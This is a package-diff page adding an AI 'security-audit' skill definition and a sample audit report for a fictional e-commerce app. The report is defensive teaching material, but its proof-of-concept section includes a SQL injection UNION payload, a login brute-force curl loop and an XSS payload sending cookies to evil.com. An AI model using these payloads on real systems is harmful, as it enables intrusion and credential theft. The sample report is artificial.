npm - skillstore-cli - Versions diffs - 1.0.0 - Mend

skillstore-cli 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (231) hide show

package/data/shared/framework/skills/security-audit/SKILL.md ADDED Viewed

@@ -0,0 +1,83 @@
+---
+name: security-audit
+description: Security vulnerability assessment — OWASP Top 10 review, secure coding verification, dependency scanning, and remediation planning
+---
+# Security Audit
+## Triggers
+Activate this skill when:
+- Performing a pre-deployment security check on application code
+- Conducting a code review with a security focus
+- Responding to a dependency vulnerability alert (npm audit, Snyk, Dependabot)
+- Addressing compliance requirements (SOC 2, HIPAA, PCI-DSS)
+- Preparing for a penetration test or external security assessment
+- Implementing new authentication or authorization flows
+- Reviewing infrastructure configuration for security posture
+## Process
+### 1. Scope Definition
+- Identify target components: APIs, frontend, backend, infrastructure, CI/CD
+- Determine compliance frameworks in scope (SOC 2, HIPAA, PCI-DSS, GDPR)
+- Catalog authentication and authorization boundaries
+- Map data flows — where sensitive data enters, is processed, stored, and transmitted
+- Define severity thresholds and acceptable risk tolerance
+### 2. Automated Scanning
+Load: `references/vulnerability-remediation.md`
+- Run dependency scanning: `npm audit`, Snyk, Trivy for container images
+- Execute SAST tools: Semgrep with project-specific rulesets, CodeQL queries
+- Check for secrets in codebase: detect-secrets, truffleHog
+- Validate infrastructure config: tfsec (Terraform), kube-bench (Kubernetes)
+- Aggregate results and deduplicate findings
+### 3. Manual Code Review
+Load: `references/owasp-checklist.md`
+Load: `references/secure-coding-patterns.md`
+- Review authentication flows: credential handling, session management, MFA
+- Inspect authorization logic: RBAC enforcement, IDOR vulnerabilities, privilege escalation paths
+- Audit input validation: injection vectors, file uploads, deserialization
+- Check cryptographic implementations: hashing algorithms, key management, TLS configuration
+- Examine error handling: information leakage, stack traces, debug endpoints
+- Verify security headers: CSP, HSTS, X-Frame-Options, X-Content-Type-Options
+### 4. Findings Classification
+- Assign CVSS v3.1 scores to each finding
+- Categorize by OWASP Top 10 (2021) mapping
+- Determine exploitability: network access required, authentication needed, user interaction
+- Assess business impact: data exposure, service disruption, compliance violation
+- Flag false positives with justification
+### 5. Remediation Plan
+- Prioritize by severity: Critical → High → Medium → Low
+- Provide specific fix code for each finding
+- Define remediation SLAs: Critical < 24h, High < 7d, Medium < 30d, Low < 90d
+- Recommend preventive controls (CI/CD gates, pre-commit hooks, security training)
+- Map fixes to compliance controls where applicable
+## Quick Reference
+| Vulnerability Type | Detection Method | Fix Pattern |
+|---|---|---|
+| SQL Injection | Semgrep rule, manual review | Parameterized queries |
+| XSS (Reflected/Stored) | DAST scan, code review | Context-specific output encoding |
+| IDOR | Manual testing, endpoint review | Middleware authorization checks |
+| SSRF | Code review, URL pattern analysis | URL allowlisting, network segmentation |
+| Broken Auth | Auth flow review, session analysis | Secure session config, MFA |
+| Sensitive Data Exposure | Secret scanning, config review | Encryption at rest/transit, secrets manager |
+| Security Misconfiguration | Config audit, header scan | Hardening checklists, IaC templates |
+| Vulnerable Dependencies | npm audit, Snyk, Trivy | Automated patching pipeline |
+## References
+- [OWASP Checklist](references/owasp-checklist.md) — OWASP Top 10 (2021) with detection techniques and fix code for each category
+- [Secure Coding Patterns](references/secure-coding-patterns.md) — input validation, output encoding, CSRF, sessions, JWT, CSP, rate limiting
+- [Vulnerability Remediation](references/vulnerability-remediation.md) — scanning tools, CVSS scoring, remediation SLAs, CI/CD security, compliance mapping
+## Assets
+- [Sample Output](assets/sample-output.md) — complete security audit report for a Node.js + React web application

package/data/shared/framework/skills/security-audit/assets/sample-output.md ADDED Viewed

@@ -0,0 +1,451 @@
+# Security Audit Report: ShopFlow — E-Commerce Platform
+**Audit Date:** 2026-03-15
+**Auditor:** Security Engineering Team
+**Application:** ShopFlow — Node.js (Express) + React + PostgreSQL
+**Environment:** Production (v2.4.1)
+**Scope:** Full stack audit — user authentication, payment processing, API endpoints, container infrastructure
+---
+## Executive Summary
+This audit identified **5 Critical**, **8 Medium**, and **4 Low** severity findings across the ShopFlow e-commerce platform. The most severe issues involve SQL injection in the product search endpoint, insecure direct object references on user profiles, and a hardcoded API key in the source code. Automated scanning revealed 3 high-severity npm vulnerabilities, 2 Semgrep findings, and 1 critical container image vulnerability. Immediate remediation is required for all Critical findings before the next production deployment.
+**Overall Risk Rating: HIGH** — Critical vulnerabilities allow unauthenticated data access and potential remote code execution.
+---
+## Scope Definition
+### Systems Audited
+- **Backend API:** Express.js REST API (42 endpoints)
+- **Frontend:** React SPA with Next.js SSR
+- **Database:** PostgreSQL 15 with Prisma ORM
+- **Authentication:** JWT-based with refresh tokens
+- **Payment Processing:** Stripe integration (server-side)
+- **Infrastructure:** Docker containers on AWS ECS, ALB, RDS
+- **CI/CD:** GitHub Actions with automated deployments
+### Compliance Frameworks
+- SOC 2 Type II (in preparation)
+- PCI-DSS v4.0 (payment processing scope)
+### Out of Scope
+- Third-party SaaS integrations (Stripe dashboard, SendGrid)
+- AWS account-level IAM (covered by separate cloud security audit)
+- Mobile applications (no mobile client exists)
+---
+## Automated Scan Results
+### npm audit
+```
+found 8 vulnerabilities (3 high, 5 moderate)
+High:
+  jsonwebtoken <9.0.0 — Algorithm confusion (CVE-2022-23529) — CVSS 7.6
+  express <4.19.2 — Path traversal (CVE-2024-29041) — CVSS 7.5
+  node-fetch <2.6.7 — SSRF via redirect (CVE-2022-0235) — CVSS 8.1
+Moderate:
+  semver <7.5.2 — ReDoS (CVE-2022-25883) — CVSS 5.3
+  tough-cookie <4.1.3 — Prototype pollution (CVE-2023-26136) — CVSS 6.5
+  word-wrap <1.2.4 — ReDoS (CVE-2023-26115) — CVSS 5.3
+  xml2js <0.5.0 — Prototype pollution (CVE-2023-0842) — CVSS 5.3
+  cookie <0.6.0 — Out-of-bounds read (CVE-2024-47764) — CVSS 5.0
+```
+### Semgrep (OWASP Top 10 Ruleset)
+```
+2 findings:
+  CRITICAL: javascript.express.security.audit.xss.mustache-escape.template-unescaped
+    File: src/api/controllers/commentController.js:47
+    Message: Unescaped user input rendered in template
+  HIGH: javascript.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd
+    File: src/api/utils/imageProcessor.js:23
+    Message: User input passed to child_process.exec()
+```
+### Trivy (Container Image)
+```
+myapp:2.4.1 (debian 12.4)
+CRITICAL: 1
+  CVE-2024-21626 — runc container breakout — CVSS 8.6
+    Fixed version: runc >= 1.1.12
+    Affected: runc 1.1.10 (in base image node:20-bullseye)
+HIGH: 2
+  CVE-2023-44487 — HTTP/2 Rapid Reset — CVSS 7.5
+  CVE-2023-39325 — Go net/http DoS — CVSS 7.5
+```
+---
+## Manual Review Findings
+### Critical Findings
+#### C1: SQL Injection in Product Search
+- **OWASP:** A03 — Injection
+- **CVSS:** 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
+- **File:** `src/api/controllers/productController.js:89`
+- **Description:** The product search endpoint concatenates user input directly into a SQL query, allowing unauthenticated SQL injection.
+**Vulnerable Code:**
+```javascript
+// src/api/controllers/productController.js:89
+async function searchProducts(req, res) {
+  const { q, category, minPrice, maxPrice } = req.query;
+  const query = `SELECT * FROM products WHERE name ILIKE '%${q}%'
+    AND category = '${category}'
+    AND price BETWEEN ${minPrice} AND ${maxPrice}
+    ORDER BY created_at DESC`;
+  const results = await pool.query(query);
+  res.json(results.rows);
+}
+```
+**Proof of Concept:**
+```
+GET /api/products/search?q=' UNION SELECT id,email,password_hash,null,null,null FROM users--&category=all&minPrice=0&maxPrice=9999
+```
+**Remediation:**
+```javascript
+async function searchProducts(req, res) {
+  const { q, category, minPrice, maxPrice } = req.query;
+  const results = await pool.query(
+    `SELECT * FROM products WHERE name ILIKE $1
+     AND category = $2
+     AND price BETWEEN $3 AND $4
+     ORDER BY created_at DESC`,
+    [`%${q}%`, category, parseFloat(minPrice) || 0, parseFloat(maxPrice) || 999999]
+  );
+  res.json(results.rows);
+}
+```
+---
+#### C2: IDOR on User Profile Endpoint
+- **OWASP:** A01 — Broken Access Control
+- **CVSS:** 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
+- **File:** `src/api/controllers/userController.js:34`
+- **Description:** Any authenticated user can access or modify any other user's profile by changing the user ID in the URL. No ownership verification is performed.
+**Vulnerable Code:**
+```javascript
+// src/api/controllers/userController.js:34
+router.get('/api/users/:id', authenticate, async (req, res) => {
+  const user = await prisma.user.findUnique({
+    where: { id: req.params.id },
+    include: { orders: true, addresses: true, paymentMethods: true },
+  });
+  res.json(user);
+});
+```
+**Proof of Concept:**
+```bash
+# Authenticated as user-123, accessing user-456's data (including payment methods)
+curl -H "Authorization: Bearer <user-123-token>" https://api.shopflow.com/api/users/user-456
+```
+**Remediation:**
+```javascript
+router.get('/api/users/:id', authenticate, async (req, res) => {
+  // Enforce ownership: users can only access their own profile
+  if (req.params.id !== req.user.id && req.user.role !== 'admin') {
+    return res.status(403).json({ error: 'Access denied' });
+  }
+  const user = await prisma.user.findUnique({
+    where: { id: req.params.id },
+    include: { orders: true, addresses: true },
+    // Exclude sensitive payment details from default response
+  });
+  res.json(user);
+});
+```
+---
+#### C3: Missing Rate Limiting on Login Endpoint
+- **OWASP:** A07 — Identification and Authentication Failures
+- **CVSS:** 8.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
+- **File:** `src/api/routes/auth.js:15`
+- **Description:** The login endpoint has no rate limiting or account lockout mechanism, allowing unlimited credential stuffing and brute-force attacks.
+**Proof of Concept:**
+```bash
+# 10,000 login attempts in 60 seconds — no blocking
+for i in $(seq 1 10000); do
+  curl -s -X POST https://api.shopflow.com/api/auth/login \
+    -H "Content-Type: application/json" \
+    -d "{\"email\":\"admin@shopflow.com\",\"password\":\"attempt${i}\"}"
+done
+```
+**Remediation:**
+```javascript
+const rateLimit = require('express-rate-limit');
+const loginLimiter = rateLimit({
+  windowMs: 15 * 60 * 1000,
+  max: 5,
+  message: { error: 'Too many login attempts. Please try again in 15 minutes.' },
+  keyGenerator: (req) => req.body.email || req.ip,
+  standardHeaders: true,
+});
+router.post('/api/auth/login', loginLimiter, loginHandler);
+```
+---
+#### C4: Stored XSS in Comment Display
+- **OWASP:** A03 — Injection (XSS)
+- **CVSS:** 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)
+- **File:** `src/frontend/components/CommentSection.jsx:28`
+- **Description:** Product review comments are rendered using `dangerouslySetInnerHTML` without sanitization. An attacker can submit a review containing JavaScript that executes in every visitor's browser, stealing session tokens or redirecting to phishing pages.
+**Vulnerable Code:**
+```jsx
+// src/frontend/components/CommentSection.jsx:28
+const Comment = ({ comment }) => (
+  <div className="comment">
+    <strong>{comment.author}</strong>
+    <div dangerouslySetInnerHTML={{ __html: comment.body }} />
+  </div>
+);
+```
+**Proof of Concept:**
+```
+POST /api/products/123/reviews
+Body: { "body": "<img src=x onerror='fetch(\"https://evil.com/steal?c=\"+document.cookie)'>" }
+```
+**Remediation:**
+```jsx
+import DOMPurify from 'dompurify';
+const Comment = ({ comment }) => (
+  <div className="comment">
+    <strong>{comment.author}</strong>
+    <div dangerouslySetInnerHTML={{
+      __html: DOMPurify.sanitize(comment.body, {
+        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li'],
+        ALLOWED_ATTR: [],
+      })
+    }} />
+  </div>
+);
+```
+---
+#### C5: Hardcoded Stripe API Key in Source Code
+- **OWASP:** A02 — Cryptographic Failures
+- **CVSS:** 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
+- **File:** `src/api/services/paymentService.js:3`
+- **Description:** The Stripe secret key is hardcoded in the source file and committed to version control. Anyone with repository access (including former employees) can access the payment processing API and issue refunds, view customer payment data, or create charges.
+**Vulnerable Code:**
+```javascript
+// src/api/services/paymentService.js:3
+const stripe = require('stripe')('sk_live_51ABC123def456GHI789jkl...');
+```
+**Remediation:**
+```javascript
+// src/api/services/paymentService.js
+const stripe = require('stripe')(process.env.STRIPE_SECRET_KEY);
+if (!process.env.STRIPE_SECRET_KEY) {
+  throw new Error('STRIPE_SECRET_KEY environment variable is not set');
+}
+```
+**Additional Steps Required:**
+1. Immediately rotate the exposed Stripe API key in the Stripe dashboard
+2. Audit Stripe logs for unauthorized activity during the exposure period
+3. Add `detect-secrets` pre-commit hook to prevent future occurrences
+4. Scan git history for other hardcoded secrets: `gitleaks detect --source .`
+---
+### Medium Findings
+#### M1: Verbose Error Messages in Production
+- **OWASP:** A05 — Security Misconfiguration
+- **CVSS:** 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
+- **File:** `src/api/middleware/errorHandler.js:12`
+- **Description:** Unhandled errors return full stack traces including file paths, library versions, and database connection strings.
+**Remediation:** Return generic error message to client; log details server-side only.
+```javascript
+app.use((err, req, res, next) => {
+  securityLogger.error('unhandled_error', { error: err.message, stack: err.stack, url: req.originalUrl });
+  res.status(500).json({ error: 'An internal error occurred. Please try again later.' });
+});
+```
+#### M2: Missing Security Headers
+- **OWASP:** A05 — Security Misconfiguration
+- **CVSS:** 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
+- **File:** `src/api/app.js`
+- **Description:** Application does not set Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, or Strict-Transport-Security headers.
+**Remediation:** Add `helmet` middleware with strict CSP configuration.
+#### M3: Weak Password Policy
+- **OWASP:** A07 — Identification and Authentication Failures
+- **CVSS:** 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)
+- **File:** `src/api/validators/userValidator.js:8`
+- **Description:** Password policy only requires 6 characters with no complexity or breach-checking requirements. Common passwords like "password123456" are accepted.
+**Remediation:** Require minimum 12 characters and integrate `zxcvbn` strength scoring.
+#### M4: Session Not Invalidated on Logout
+- **OWASP:** A07 — Identification and Authentication Failures
+- **CVSS:** 4.8 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)
+- **File:** `src/api/controllers/authController.js:67`
+- **Description:** The logout endpoint removes the token from the client but does not invalidate it server-side. Captured tokens remain valid until expiration (24 hours).
+**Remediation:** Add JWT token ID (`jti`) to a Redis denylist on logout, check denylist on every authenticated request.
+#### M5: Missing CSRF Protection on State-Changing Endpoints
+- **OWASP:** A01 — Broken Access Control
+- **CVSS:** 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)
+- **File:** `src/api/routes/*.js`
+- **Description:** POST/PUT/DELETE endpoints rely solely on JWT Bearer tokens. SameSite cookie attribute is not set, and no CSRF token mechanism exists. If the JWT is stored in a cookie (which it is for SSR pages), cross-site form submissions can perform actions.
+**Remediation:** Set `SameSite=Lax` on session cookies and implement double-submit cookie CSRF pattern.
+#### M6: Permissive CORS Configuration
+- **OWASP:** A05 — Security Misconfiguration
+- **CVSS:** 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
+- **File:** `src/api/app.js:18`
+- **Description:** CORS is configured with `origin: true`, which reflects any requesting origin. Combined with `credentials: true`, this allows any website to make authenticated API requests on behalf of logged-in users.
+**Remediation:** Restrict `origin` to explicit list of allowed domains.
+#### M7: No Audit Logging
+- **OWASP:** A09 — Security Logging and Monitoring Failures
+- **CVSS:** 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
+- **File:** N/A (missing implementation)
+- **Description:** No security event logging for authentication attempts, authorization failures, or sensitive data access. This prevents detection of active attacks and makes incident investigation impossible.
+**Remediation:** Implement structured security logging with Winston. Log all auth events, access control decisions, and input validation failures.
+#### M8: JWT Algorithm Not Enforced
+- **OWASP:** A02 — Cryptographic Failures
+- **CVSS:** 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
+- **File:** `src/api/middleware/auth.js:14`
+- **Description:** JWT verification does not specify `algorithms` option, making it vulnerable to algorithm confusion attacks where an attacker uses the `none` algorithm or switches from RS256 to HS256 using the public key as the HMAC secret.
+**Remediation:**
+```javascript
+jwt.verify(token, secret, { algorithms: ['HS256'] });
+```
+---
+### Low Findings
+#### L1: Server Version Disclosure
+- **CVSS:** 2.6
+- **Description:** `X-Powered-By: Express` header reveals server technology.
+- **Remediation:** `app.disable('x-powered-by')` or use `helmet()`.
+#### L2: Cookie Missing `__Host-` Prefix
+- **CVSS:** 2.4
+- **Description:** Session cookie name is `sid` instead of using the `__Host-` prefix, which enforces `Secure`, `Path=/`, and no `Domain` attribute.
+- **Remediation:** Rename cookie to `__Host-sid`.
+#### L3: Missing `Referrer-Policy` Header
+- **CVSS:** 2.1
+- **Description:** No Referrer-Policy set; sensitive URL parameters may leak via Referer header to external sites.
+- **Remediation:** Set `Referrer-Policy: strict-origin-when-cross-origin`.
+#### L4: Autocomplete Not Disabled on Payment Forms
+- **CVSS:** 1.8
+- **Description:** Credit card input fields do not set `autocomplete="off"`, potentially caching card numbers in browser storage.
+- **Remediation:** Add `autocomplete="cc-number"` with appropriate values per PCI-DSS guidance (browsers may still autocomplete but it satisfies compliance).
+---
+## Remediation Plan
+### Sprint 1 — Critical Fixes (Week 1)
+| # | Finding | Owner | Status |
+|---|---|---|---|
+| C5 | Rotate and remove hardcoded Stripe key | DevOps + Backend | Day 1 — Immediate |
+| C1 | Parameterize SQL in product search | Backend | Day 1-2 |
+| C2 | Add ownership checks to user endpoints | Backend | Day 2-3 |
+| C3 | Implement login rate limiting | Backend | Day 3 |
+| C4 | Sanitize comment rendering | Frontend | Day 3-4 |
+| — | Update container base image (runc CVE) | DevOps | Day 1 |
+| — | Upgrade jsonwebtoken, express, node-fetch | Backend | Day 2 |
+### Sprint 2 — Medium Fixes (Week 2-3)
+| # | Finding | Owner | Status |
+|---|---|---|---|
+| M8 | Enforce JWT algorithm validation | Backend | Week 2 |
+| M5 | Implement CSRF protection | Backend | Week 2 |
+| M6 | Restrict CORS to explicit origins | Backend | Week 2 |
+| M1 | Sanitize production error responses | Backend | Week 2 |
+| M2 | Add security headers via helmet | Backend | Week 2 |
+| M3 | Strengthen password policy | Backend | Week 3 |
+| M4 | Implement server-side session invalidation | Backend | Week 3 |
+| M7 | Add structured security logging | Backend | Week 3 |
+### Sprint 3 — Low Fixes & Hardening (Week 4)
+| # | Finding | Owner | Status |
+|---|---|---|---|
+| L1-L4 | All low findings | Backend + Frontend | Week 4 |
+| — | Add detect-secrets pre-commit hook | DevOps | Week 4 |
+| — | Enable Semgrep in CI pipeline | DevOps | Week 4 |
+| — | Add Trivy container scan to deploy gate | DevOps | Week 4 |
+| — | Security awareness training for dev team | Security | Week 4 |
+---
+## Compliance Gap Analysis
+### SOC 2 Controls Needing Attention
+| Control | Gap | Remediation |
+|---|---|---|
+| CC6.1 — Logical access security | IDOR allows unauthorized data access (C2) | Implement ownership verification on all endpoints |
+| CC7.2 — System monitoring | No security event logging (M7) | Deploy structured security logging with alerting |
+| CC6.6 — Threats from external sources | Missing rate limiting (C3), permissive CORS (M6) | Implement rate limiting and restrict CORS |
+### PCI-DSS v4.0 Gaps
+| Requirement | Gap | Remediation |
+|---|---|---|
+| Req 3.4 — Render PAN unreadable | Hardcoded Stripe key in source (C5) | Rotate key, use environment variables, add secret scanning |
+| Req 6.2 — Secure development | SQL injection (C1), XSS (C4) present | Fix vulnerabilities, add SAST to CI pipeline |
+| Req 8.3 — Strong authentication | Weak password policy (M3), no lockout (C3) | Implement 12-char policy with breach checking, add rate limiting |
+| Req 10.2 — Audit trail | No security logging (M7) | Implement comprehensive audit logging |
+---
+## Recommendations
+1. **Immediate:** Rotate the exposed Stripe API key and audit Stripe logs for unauthorized activity
+2. **Short-term:** Fix all Critical findings before next production deployment
+3. **Medium-term:** Establish security testing in CI/CD (Semgrep, npm audit, Trivy) to prevent regression
+4. **Long-term:** Implement threat modeling for new features, schedule quarterly security reviews, and conduct annual penetration testing
+---
+*Report generated as part of pre-SOC 2 security assessment. Next audit scheduled: Q3 2026.*